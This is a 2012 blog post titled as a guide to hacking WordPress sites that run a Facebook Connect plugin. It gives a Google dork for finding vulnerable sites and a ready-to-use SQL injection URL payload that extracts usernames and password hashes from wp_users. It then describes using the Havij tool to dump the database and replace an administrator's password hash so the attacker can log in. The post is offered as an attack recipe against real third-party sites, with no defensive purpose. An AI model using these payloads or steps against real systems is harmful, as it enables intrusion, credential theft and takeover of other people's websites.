Blogger Widgets

Labels

Flash Labels by Way2Blogging

Tuesday, 10 July 2012

How to hack wordpress websites || SQli vulnerability & exploit

| |
There is so many Pepoles using Facebook Connect Wordpress plugin for their blogs. They think it's cool. But it could be a Big Security hole. Here's the way to hack these sites.


Step 1 : http://www.google.com

Step 2:Now enter this dork to find sites with security hole..


inurl:"fbconnect_action=myhome"


 Step 3: You will find many sites, Select the site which you are comfortable with. 

You will find something like that.


Step 4: Now replace 
?fbconnect_action=myhome&userid=

with this
 
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--

Step 5: Now you have the User name and Password.


Step 6: The password is encrypted with Wordpress md5 (blowfish). You need to decode this. 


Step 7: Then find the administrator panel out. Normally it should be in 

www.victrimsite.com/wp-admin
or 
www.victrimsite.com/wp-login.php







Note: Decoding this type of password may take a big time.

So you here is another way to hack the password.....


Step 1: Open Havij and paste the blog url you are going to hack..

Example: 

http://www.victrimsite.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29z0mbyak,7,8,9,10,11,12+from+wp_users--

Step 2: Now find Databases, Tables.

Step 3: Select wp-users then find tick on all columns. Then click on Get Data.

Step 4: You will find something like that..




Step 5: Now select any user and change the user_pass to 

$P$BbCzkVXQ6r.T8znShDPMSzM7Whhubc/

Step 6: Now login with the password hackintruths .

0 comments:

Post a Comment